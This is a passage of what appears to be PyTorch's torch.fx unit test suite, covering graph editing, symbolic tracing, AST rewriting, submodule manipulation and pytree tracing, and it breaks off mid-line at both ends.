graph) input = torch.randn(33, 44) self.assertEqual(gm(input), torch.relu(torch.neg(input))) def test_prepend_self(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) b.prepend(b) x.append(b) self.assertEqual(len(graph.nodes), 3) def test_erase_node_error(self): st = SimpleTest() traced = symbolic_trace(st) for node in traced.graph.nodes: # Test deleting with uses both in another Node and at the output if node.target in [operator.add, torch.relu]: with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'): traced.graph.erase_node(node) def test_copy_it(self): d = immutable_dict([(3, 4), (5, 6)]) l = immutable_list([(3, 4), (5, 6)]) self.assertEqual(d, deepcopy(d)) self.assertEqual(l, deepcopy(l)) def test_get_torch_func_signature(self): for key in dir(torch): obj = getattr(torch, key) if callable(obj): schemas = get_signature_for_torch_op(obj) def test_find_uses(self): graph = torch.fx.Graph() x = torch.fx.Proxy(graph.placeholder('x')) y = torch.relu(x) z = x + x u = torch.neg(x) graph.output((y + z + u).node) graph.lint() users_of_x = x.node.users self.assertEqual(len(users_of_x), 3) expected_ops = set(['relu', 'add', 'neg']) for use in users_of_x: assert any(use.name.startswith(prefix) for prefix in expected_ops) def test_inline_graph(self): class InlineInto(torch.nn.Module): def forward(self, x): return torch.relu(x) class ToInline(torch.nn.Module): def forward(self, x): return torch.neg(x) inline_into = symbolic_trace(InlineInto()) to_inline = symbolic_trace(ToInline()) combined_graph = torch.fx.Graph() output_node = combined_graph.graph_copy(inline_into.graph, {}) input_node = list(to_inline.graph.nodes)[0] assert input_node and input_node.op == 'placeholder' val_map = {input_node : output_node} output = combined_graph.graph_copy(to_inline.graph, val_map) combined_graph.output(output) combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph) input = torch.rand(3, 4) self.assertEqual(combined_module(input), input.relu().neg()) def test_multi_insert_point(self): graph = torch.fx.Graph() x = torch.fx.Proxy(graph.placeholder('x')) relu = torch.relu(x) with graph.inserting_before(relu.node): y = torch.neg(x) z = torch.tanh(y) graph.output((relu.node, z.node)) graph.lint() expected_ops = ['x', 'neg', 'tanh', 'relu'] for node, expected in zip(graph.nodes, expected_ops): assert expected in node.name def test_reassign_args_kwargs_uses(self): graph = torch.fx.Graph() x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y')) z = x + y zed = z + z + z graph.output(zed.node) graph.lint() # zed = z + z + z -> zed = z + z + x zed.node.args = (zed.node.args[0], x.node) self.assertEqual(list(x.node.users.keys()), [z.node, zed.node]) # z = x + y -> z = y + y z.node.args = (y.node, y.node) self.assertEqual(list(x.node.users.keys()), [zed.node]) def test_trace_function(self): def foo(x, y): return torch.relu(x) + y x, y = torch.randn(3, 4), torch.randn(3, 4) self.checkGraphModule(foo, (x, y)) def test_trace_dict_int_keys(self): class ModWithDictArg(torch.nn.Module): def forward(self, d : Dict[int, torch.Tensor]): return d[42] class CallsModWithDict(torch.nn.Module): def __init__(self): super().__init__() self.m = ModWithDictArg() def forward(self, x): return self.m({42: x}) class MyTracer(torch.fx.Tracer): def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool: return isinstance(m, ModWithDictArg) traced_graph = MyTracer().trace(CallsModWithDict()) def test_trace_dict_proxy_keys(self): class ModWithDictArg(torch.nn.Module): def forward(self, d : Dict[torch.Tensor, torch.Tensor]): return d[42] class CallsModWithDict(torch.nn.Module): def __init__(self): super().__init__() self.m = ModWithDictArg() def forward(self, x): return self.m({x: x}) class MyTracer(torch.fx.Tracer): def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool: return isinstance(m, ModWithDictArg) with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'): traced_graph = MyTracer().trace(CallsModWithDict()) def test_module_deepcopy_edit_nodes(self): class Foo(torch.nn.Module): def forward(self, x): return torch.relu(x) traced1 = symbolic_trace(Foo()) copied = copy.deepcopy(traced1) for node in copied.graph.nodes: if node.target == torch.relu: node.target = torch.neg copied.recompile() traced1.recompile() x = torch.randn(15, 15) torch.testing.assert_allclose(traced1(x), torch.relu(x)) torch.testing.assert_allclose(copied(x), torch.neg(x)) def test_direct_param_use(self): class TransposeTest(torch.nn.Module): def __init__(self): super().__init__() self.b = torch.nn.Parameter(torch.rand(4, 3)) def forward(self, x): return self.b class Foo(torch.nn.Module): def __init__(self): super().__init__() self.a = TransposeTest() def forward(self, x): return self.a.b, self.a.b.t(), self.a.b.view(12) traced = torch.fx.symbolic_trace(Foo()) assert(all('constant' not in node.target for node in traced.graph.nodes)) def test_single_default_arg(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, y=1): return y m = M() self.checkGraphModule(m, ()) self.checkGraphModule(m, (3,)) def test_multiple_default_args(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, y=1, z=2): return y + z m = M() self.checkGraphModule(m, ()) self.checkGraphModule(m, (3,)) self.checkGraphModule(m, (3, 4)) def test_regular_and_default_args(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, x, y=1): return x + y m = M() self.checkGraphModule(m, (2,)) self.checkGraphModule(m, (2, 3)) def test_string_literal_return(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self): return "foo" m = M() self.checkGraphModule(m, ()) def test_namedtuple_return_qualname(self): class NamedTupReturn(torch.nn.Module): def forward(self, x): return MyNamedTup(x, x) traced = symbolic_trace(NamedTupReturn()) input = torch.rand(3, 4) self.assertEqual(traced(input), MyNamedTup(input, input)) def test_update_args_kwargs_yells_at_you(self): symtraced = symbolic_trace(SimpleTest()) node = next(iter(symtraced.graph.nodes)) with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'): node.__update_args_kwargs((), {}) def test_torchbind_class_attribute_in_fx(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping") class FooBar1234(torch.nn.Module): def __init__(self): super(FooBar1234, self).__init__() self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"]) def forward(self): return self.f.top() m = FooBar1234() self.checkGraphModule(m, ()) def test_torchbind_class_attribute_in_fx_tensor_arg(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping") class FooBar2341(torch.nn.Module): def __init__(self): super(FooBar2341, self).__init__() self.f = torch.classes._TorchScriptTesting._ReLUClass() def forward(self, x): return self.f.run(x) m = FooBar2341() traced = symbolic_trace(m) input = torch.randn(3, 4) self.assertEqual(traced(input), m(input)) self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes)) def test_script_method_trace(self): class Scripted(torch.nn.Module): def forward(self, x): return torch.relu(x) class Holder(torch.nn.Module): def __init__(self): super().__init__() self.s = torch.jit.script(Scripted()) def forward(self, x): return self.s(x) h = Holder() traced = symbolic_trace(h) input = torch.randn(3, 4) self.assertEqual(traced(input), h(input)) self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes)) def test_namedtuple_return_trace(self): class NamedTupReturn(torch.nn.Module): def forward(self, x): return Pair(x, x) traced = symbolic_trace(NamedTupReturn()) input = torch.rand(3, 4) self.assertEqual(traced(input), Pair(input, input)) def test_return_type_exists(self): class ReturnTypeModule(torch.nn.Module): def other(self, x: List[str]) -> List[str]: return x def forward(self, x: List[str]) -> List[str]: return self.other(x) traced = symbolic_trace(ReturnTypeModule()) self.assertIn("-> typing_List[str]", traced._code) scripted = torch.jit.script(traced) self.assertIn("-> List[str]", scripted.code) def getitem_inner(self): class GetItemBase(torch.nn.Module): def __init__(self): super().__init__() self.register_buffer('pe', torch.randn(8, 8)) class GetItem1(GetItemBase): def forward(self, x): return self.pe[:, :x.size(0)] class GetItem2(GetItemBase): def forward(self, x): return self.pe[x.size(0)] class GetItem3(GetItemBase): def forward(self, x): return self.pe[4] # fx creates `self._tensor_constant0` here self.checkGraphModule(GetItem1(), [torch.zeros(4)]) self.checkGraphModule(GetItem2(), [torch.zeros(4)]) self.checkGraphModule(GetItem3(), [torch.zeros(4)]) @unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1", "Will be checked in test_getitem_subproc") def test_getitem(self): self.getitem_inner() def test_getitem_subproc(self): # need to run this test in a subproc to work around: # https://github.com/pytorch/pytorch/issues/50710 proc = Process(target=run_getitem_target) proc.start() proc.join() self.assertEqual(proc.exitcode, 0) def test_user_friendly_call_provenance_with_function(self): def fn(x): return wrapper_fn(x) traced = torch.fx.symbolic_trace(fn) with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is " "being compiled since it was called" " from 'fn.forward'"): scripted = torch.jit.script(traced) def test_user_friendly_call_provenance_with_module(self): class M(torch.nn.Module): def forward(self, x): return wrapper_fn(x) traced = torch.fx.symbolic_trace(M()) with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is " "being compiled since it was called" " from 'M.forward'"): scripted = torch.jit.script(traced) def test_snake_case(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.activations = torch.nn.ModuleDict([ ["snake_case", torch.nn.ReLU()], ["PascalCase", torch.nn.LeakyReLU()], ["ALL_CAPS", torch.nn.PReLU()] ]) def forward(self, x): a = self.activations["snake_case"](x) b = self.activations["PascalCase"](x) c = self.activations["ALL_CAPS"](x) return a, b, c traced = symbolic_trace(M()) check = [ ("activations_snake_case", "activations.snake_case"), ("activations_pascal_case", "activations.PascalCase"), ("activations_all_caps", "activations.ALL_CAPS") ] i = 0 for node in traced.graph.nodes: if node.op == "placeholder" or node.op == "output": continue name = check[i][0] target = check[i][1] self.assertEqual(name, node.name) self.assertEqual(target, node.target) i += 1 self.assertEqual(i, 3) def test_no_mutation(self): from torch.fx.immutable_collections import immutable_list x = immutable_list([3, 4]) with self.assertRaisesRegex(NotImplementedError, "new_args"): x[0] = 4 def test_partial_trace(self): class Foo(torch.nn.Module): def forward(self, x, y): if y: return 2 * x else: return x mod = Foo() mod_true = symbolic_trace(mod, concrete_args={'y': True}) mod_false = symbolic_trace(mod, concrete_args={'y': False}) self.assertEqual(mod_true(3, True), 6) print(mod_true.code) assert(any([i.target == torch._assert for i in mod_true.graph.nodes])) with self.assertRaises(AssertionError): mod_true(3, False) self.assertEqual(mod_false(3, False), 3) with self.assertRaises(AssertionError): mod_false(3, True) def f_higher(a, f): return f(a) nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2}) self.assertEqual(nf(3, lambda x: x * 2), 6) def test_custom_traceback_raised_when_exception_source_is_graphmodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.W = torch.nn.Parameter(torch.randn(5)) def forward(self, x): return torch.dot(self.W, x) traced = torch.fx.symbolic_trace(M()) out = [n for n in traced.graph.nodes if n.op == "output"][-1] with traced.graph.inserting_before(out): relu_out = traced.graph.call_method(method_name='relu', args=(out.args[0],)) out.args = (relu_out,) traced.recompile() with self.capture_stderr() as captured: with self.assertRaises(TypeError): traced(5) self.assertRegex(captured[0], r"Call using an FX-traced Module, line .* of the " r"traced Module's generated forward function:") def test_custom_traceback_not_raised_when_exception_source_is_submodule(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.linear = torch.nn.Linear(3, 4) def forward(self, x): return self.linear(x) traced = torch.fx.symbolic_trace(M()) # Do not change this to `capture_stderr` or another context # manager without ensuring that the output is as expected try: traced(torch.rand(5, 5)) except RuntimeError: captured = traceback.format_exc() self.assertNotRegex(captured, r"Call using an FX-traced Module, line .* of the " r"traced Module's generated forward function:") def test_graph_module_replicate_for_dp(self): class Foo(torch.nn.Module): def forward(self, x): return torch.relu(x) gm = torch.fx.symbolic_trace(Foo()) x = torch.randn(5, 3) out = gm(x) replica = gm._replicate_for_data_parallel() out_replica = replica(x) torch.testing.assert_allclose(out_replica, out) def test_ast_rewriter_rewrites_assert(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor, y: int, z: int): assert y == z return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_ast_rewriter_rewrites_assert_with_message(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor, y: int, z: int): assert y == z, "msg" return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_throw_out_variant(self): def foo(x): y = torch.rand_like(x) torch.sigmoid(x, out=y) return y class MyTracer(torch.fx.Tracer): check_mutable_operations = True tracer = MyTracer() with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'): traced_graph = tracer.trace(foo) def test_ast_rewriter_reassigns_submodules(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.bn = torch.nn.BatchNorm2d(100) def forward(self, x: torch.Tensor): return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_ast_rewriter_wrap(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5)) def to_trace(y): return ( a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y) ) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("a_lifted_leaf", traced.code) self.assertEqual(27, traced(2)) self.assertIs(a_lifted_leaf, real_a_lifed_leaf) def test_ast_rewriter_wrap_fn_directly(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5)) def to_trace(y): return ( a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y) ) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("a_lifted_leaf2", traced.code) self.assertEqual(27, traced(2)) self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2) def test_profiler_ranges_side_effect(self): g = torch.fx.Graph() handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',)) g.call_function(torch.ops.profiler._record_function_exit, (handle,)) g.output(None) found_targets = {} for node in g.nodes: if node.op == 'call_function': found_targets.setdefault(node.target) self.assertEqual( list(found_targets.keys()), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit] ) g.eliminate_dead_code() found_targets = {} for node in g.nodes: if node.op == 'call_function': found_targets.setdefault(node.target) self.assertEqual( list(found_targets.keys()), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit] ) def test_ast_rewriter_wrapped_via_decorator(self): class F(torch.nn.Module): def forward(self, x): return wrapped_via_decorator(x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(F()) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_via_decorator", traced.code) self.assertEqual(traced(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_ast_rewriter_wrapped_via_decorator_and_transformed(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_via_decorator", traced.code) self.assertEqual(traced(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) transformed = torch.fx.Transformer(traced).transform() self.assertIn("wrapped_via_decorator", transformed.code) self.assertEqual(transformed(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_ast_rewriter_wrap_with_submodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) def forward(self, x: torch.Tensor): return wrapped_with_submodule(x, self.batchnorm1d) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_with_submodule", traced.code) input = torch.rand(3, 2) ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) self.assertEqual(ref_batchnorm1d(input), traced(input)) def test_submodule_manipulation_API(self): class C(torch.nn.Module): def __init__(self): super(C, self).__init__() self.conv = torch.nn.Conv2d(16, 33, 3, stride=2) self.param = torch.nn.Parameter(torch.rand(2, 3)) def forward(self, x): return self.conv(torch.cat([self.param, x])) class B(torch.nn.Module): def __init__(self): super(B, self).__init__() self.linear = torch.nn.Linear(100, 200) self.register_buffer("buf", torch.randn(2, 3)) self.net_c = C() def forward(self, x): return self.linear(torch.cat([self.buf, self.net_c(x)])) class A(torch.nn.Module): def __init__(self): super(A, self).__init__() self.net_b = B() self.param = torch.nn.Parameter(torch.rand(2, 3)) def forward(self, x): return self.net_b(x) + self.param a = symbolic_trace(A()) a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2)) conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1] with a.graph.inserting_before(conv): with warnings.catch_warnings(record=True) as w: dropout = a.graph.call_module(module_name="net_b.net_c.dropout", args=conv.args) self.assertEqual(len(w), 0) conv.replace_all_uses_with(dropout) a.graph.erase_node(conv) a.recompile() def module_exists(gm: GraphModule, path: str) -> bool: return any(path == name for name, _ in gm.named_modules()) def parameter_exists(gm: GraphModule, path: str) -> bool: return (any(path == name for name, _ in gm.named_parameters()) and any(path == name for name in gm.state_dict().keys())) def buffer_exists(gm: GraphModule, path: str) -> bool: return (any(path == name for name, _ in gm.named_buffers()) and any(path == name for name in gm.state_dict().keys())) # Test that we added the "dropout" submodule self.assertTrue(module_exists(a, "net_b.net_c.dropout")) # Test `get_submodule` with an added submodule self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout")) # Test that the "conv" submodule is still there self.assertTrue(module_exists(a, "net_b.net_c.conv")) # Test `get_submodule` with an original module self.assertIsNotNone(a.get_submodule("net_b.net_c.conv")) # Test that the "conv" node is NOT still there conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"] self.assertEqual(conv, []) a.delete_submodule("net_b.net_c.conv") # Test that the "conv" submodule is now gone self.assertFalse(module_exists(a, "net_b.net_c.conv")) # Test `get_submodule` with a deleted submodule with self.assertRaisesRegex(AttributeError, "has no attribute " "`conv`"): self.assertIsNone(a.get_submodule("net_b.net_c.conv")) # Test `get_attr` warnings cat = [n for n in a.graph.nodes if n.target == torch.cat][-1] with a.graph.inserting_before(cat): with warnings.catch_warnings(record=True) as w: param = a.graph.get_attr(qualified_name="net_b.net_c.param") self.assertEqual(len(w), 0) with self.assertWarnsRegex(UserWarning, "Attempted to " "insert a get_attr Node with no " "underlying reference in the " "owning GraphModule"): bad_param = a.graph.get_attr(qualified_name="net_b.param") a.graph.erase_node(bad_param) cat.args = (*cat.args, param) a.recompile() a.graph.lint() # Test `get_parameter` a.get_parameter("net_b.net_c.param") with self.assertRaisesRegex(AttributeError, "is not an " "nn.Parameter"): a.get_parameter("net_b.buf") with self.assertRaisesRegex(AttributeError, "has no attribute " "`param`"): a.get_parameter("net_b.param") # Test `get_buffer` a.get_buffer("net_b.buf") with self.assertRaisesRegex(AttributeError, "is not a " "buffer"): a.get_buffer("net_b.net_c.param") with self.assertRaisesRegex(AttributeError, "has no attribute " "`buf`"): a.get_buffer("net_b.net_c.buf") # Test non-nested attributes a.get_submodule("") a.get_parameter("param") # Insert some unused submodules a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3)) a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3)) a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2)) a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100)) # Garbage collection a.delete_all_unused_submodules() # Test that all the unused submodules are gone self.assertFalse(module_exists(a, "net_b.embedding")) self.assertFalse(module_exists(a, "net_b.net_c.embedding")) self.assertFalse(module_exists(a, "net_b.net_c.rnn")) self.assertFalse(module_exists(a, "batch_norm_2d")) # Test that we didn't delete any unused Parameters or buffers self.assertTrue(parameter_exists(a, "net_b.net_c.param")) self.assertTrue(buffer_exists(a, "net_b.buf")) a.graph.lint() def test_delete_unused_submodules_leaf(self): class SubModule(torch.nn.Module): def __init__(self): super().__init__() self.linear = torch.nn.Linear(10, 10) self.relu = torch.nn.ReLU() def forward(self, x): x = self.linear(x) x = self.relu(x) return x class Model(torch.nn.Module): def __init__(self): super().__init__() self.submod = SubModule() def forward(self, x): x = self.submod(x) return x model = Model() class MyCustomTracer(torch.fx.Tracer): def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool: return module_qualified_name == "submod" inputs = torch.randn(1, 10) traced_graph = MyCustomTracer().trace(model) gm2 = torch.fx.GraphModule(model, traced_graph) gm2.delete_all_unused_submodules() torch.testing.assert_allclose(gm2(inputs), model(inputs)) def test_tracing_graphmodules_as_leaf_submodules(self): class A(torch.nn.Module): def forward(self, t): return t + t class B(torch.nn.Module): def __init__(self): super(type(self), self).__init__() self.calling = False self.called = False def forward(self, t): if self.calling: return t - t else: return t + t def __call__(self, *args): self.called = True self.calling = True return super(type(self), self).__call__(*args) self.calling = False class M(torch.nn.Module): def __init__(self, a, b): super().__init__() self.a = a self.b = b def forward(self, t): x = self.a(t) y = self.b(t) return x + y class LeafTracer(Tracer): def is_leaf_module(self, module, name): return True class LeafTracerNotB(Tracer): def is_leaf_module(self, module, name): return False if "b" in name else True # Recompile calls added "for fun", since they # chain __call__ wrappers. # # Test: B as a regular, non-leaf module # a = symbolic_trace(A()) a.recompile() m = M(a, B()) graph = LeafTracerNotB().trace(m) gm = GraphModule(m, graph) gm.recompile() # Test graphmodule/submodule a is not inlined. self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"] self.assertTrue(len(match) == 1) # Test submodule b is not treated as leaf. self.assertFalse(hasattr(gm, "b")) # Test assert custom __call__ on submodule b was honored. match = [ n for n in gm.graph.nodes if n.op == "call_function" and n.target == operator.sub ] self.assertTrue(len(match) == 1) # # Test: B as a regular, leaf module # symbolic_trace should only patch torch.nn.Module.__call__, # which means B.__call__ should still execute # a = symbolic_trace(A()) a.recompile() b = B() m = M(a, b) graph = LeafTracer().trace(m) gm = GraphModule(m, graph) gm.recompile() # Test graphmodule/submodule a is not inlined. self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"] self.assertTrue(len(match) == 1) # Test submodule b is leaf: self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"] self.assertTrue(len(match) == 1) # Test b.__call__ was run self.assertTrue(b.called) self.assertTrue(gm.get_submodule("b").called) # # Test: B as GraphModule leaf # __call__ not honored since symbolic_trace directly invokes forward() # a = symbolic_trace(A()) a.recompile() b = symbolic_trace(B()) b.recompile() m = M(a, b) graph = LeafTracer().trace(m) gm = GraphModule(m, graph) gm.recompile() self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"] self.assertTrue(len(match) == 1) self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"] self.assertTrue(len(match) == 1) def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.register_buffer("my_buff", torch.rand(3, 4)) self.register_parameter( "my_param", torch.nn.Parameter(torch.rand(3, 4)) ) def forward(self, x): return x + self.my_buff + self.my_param mod = MyModule() mod_traced = symbolic_trace(mod) # Create new GraphModule based on original, either w/ dict or root module. orig_buff = mod_traced.get_buffer("my_buff") orig_param = mod_traced.get_parameter("my_param") mod_traced_new = GraphModule( {"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod, mod_traced.graph, ) # Check that both my_buff and my_param are found and the same. try: new_buff = mod_traced_new.get_buffer("my_buff") except Exception: self.fail("Did not find my_buff") self.assertEqual(orig_buff, new_buff) try: new_param = mod_traced_new.get_parameter("my_param") except Exception: self.fail("Did not find my_param") self.assertEqual(orig_param, new_param) x = torch.rand(3, 4) orig_out = mod_traced(x) submodules_out = mod_traced_new(x) self.assertEqual(orig_out, submodules_out) def test_graph_module_init_buffer_param_copied_dict_init(self): self._test_graph_module_init_buffer_param_copied(use_dict_init=True) def test_graph_module_init_buffer_param_copied_mod_init(self): self._test_graph_module_init_buffer_param_copied(use_dict_init=False) def test_annotations_with_no_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: torch.Tensor, a: A) -> torch.Tensor: return a(x) self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) def test_annotations_with_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor': return a(x) self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor: return a(x[0]) self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) def test_annotations_with_non_torch_reference_and_internal_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor': return a(x)[0] self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) @unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature " "`annotations` is not defined in Python <3.7") def test_annotation_with_future(self): try: import fx.test_future # noqa: F401 finally: del sys.modules["__future__"] def test_annotations_empty_tuple(self): class Foo(torch.nn.Module): def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]): return "foo" traced = torch.fx.symbolic_trace(Foo()) x = () y = ("bar", ()) traced(x, y) FileCheck().check("_Tuple[()]") \ .check("typing_Tuple[str,typing_Tuple[()]]") \ .run(traced.code) scripted = torch.jit.script(traced) scripted(x, y) FileCheck().check("Tuple[()]") \ .check("Tuple[str, Tuple[()]]") \ .run(scripted.code) @unittest.skipIf(IS_WINDOWS, "Python Windows bug? https://bugs.python.org/issue45108") def test_assert(self): def f(x): assert x > 1 return x + 1 try: torch.fx.proxy.TracerBase.trace_asserts = True traced = symbolic_trace(f) finally: torch.fx.proxy.TracerBase.trace_asserts = False self.assertEqual(f(2), traced(2)) with self.assertRaises(AssertionError): traced(0) def test_pytree(self): def f_sum(x): return sum(x) def f_sum_dict(x): out = 0 for k, v in x.items(): out += v return out def f_dict_list_map(x): new_dict = {} for k, v in x.items(): new_dict[k] = [i + 1 for i in v] return new_dict def f_dict_add(x): return x['a'] + sum(x['z']) def f_namedtuple_add(x): return x.x + x.y pytree._register_pytree_node( Foo, lambda x: ([x.a, x.b], None), lambda x, _: Foo(x[0], x[1]), ) fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b]) def f_custom(x): return x.a + x.b def f_custom_dict(x): return f_sum_dict(x.a) + x.b def f_return_custom(x): return Foo(x.b, x.a) tests = [ (f_sum, [PH, PH, PH]), (f_sum, []), (f_sum_dict, {'a': PH, 'b': PH, 'c': PH}), (f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}), (f_dict_list_map, {5: (PH, PH, PH)}), (f_dict_add, {'a': PH, 'z': (PH, PH, PH)}), (f_dict_add, {'a': PH, 'z': []}), (f_custom, Foo(PH, PH)), (f_custom, Foo(PH, 3)), (f_custom_dict, Foo({'a': PH, 'b': PH}, PH)), # (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees (f_namedtuple_add, Point(PH, PH)), ] def verify_pytree(f, inp): val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp) num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]]) orig_out = f(val) nf = symbolic_trace(f, concrete_args={'x': inp}) self.assertEqual(nf(val), orig_out) assert num_flat_args == 0 or "tree_flatten_spec" in nf.code assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args) nf = symbolic_trace(nf) self.assertEqual(nf(val), orig_out) assert "tree_flatten_spec" not in nf.code assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1) nf = symbolic_trace(nf, concrete_args={'x': inp}) self.assertEqual(nf(val), orig_out) assert num_flat_args == 0 or "tree_flatten_spec" in nf.code assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args) pickled = pickle.dumps(nf) nf = pickle.loads(pickled) self.assertEqual(nf(val), orig_out) for f, inp in tests: verify_pytree(f, inp) def test_pytree_concrete(self): def f(b, a): if b: return a['a'] else: return a['z'] inp = {'a': {'a': PH, 'z': PH}, 'b': True} nf = symbolic_trace(f, concrete_args=inp) val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp) self.assertEqual(nf(**val), f(**val)) nf = symbolic_trace(nf) self.assertEqual(nf(**val), f(**val)) def test_imul_code_print(self): graph = torch.fx.Graph() a = graph.placeholder("a") b = graph.placeholder("b") graph.call_function(operator.imul, (a, b), {}) graph.output(a) gm = torch.fx.GraphModule({}, graph) gm.recompile() self.assertEqual(gm(2, 3), 6) self.assertIn("a *= b", gm.code) def run_getitem_target(): from 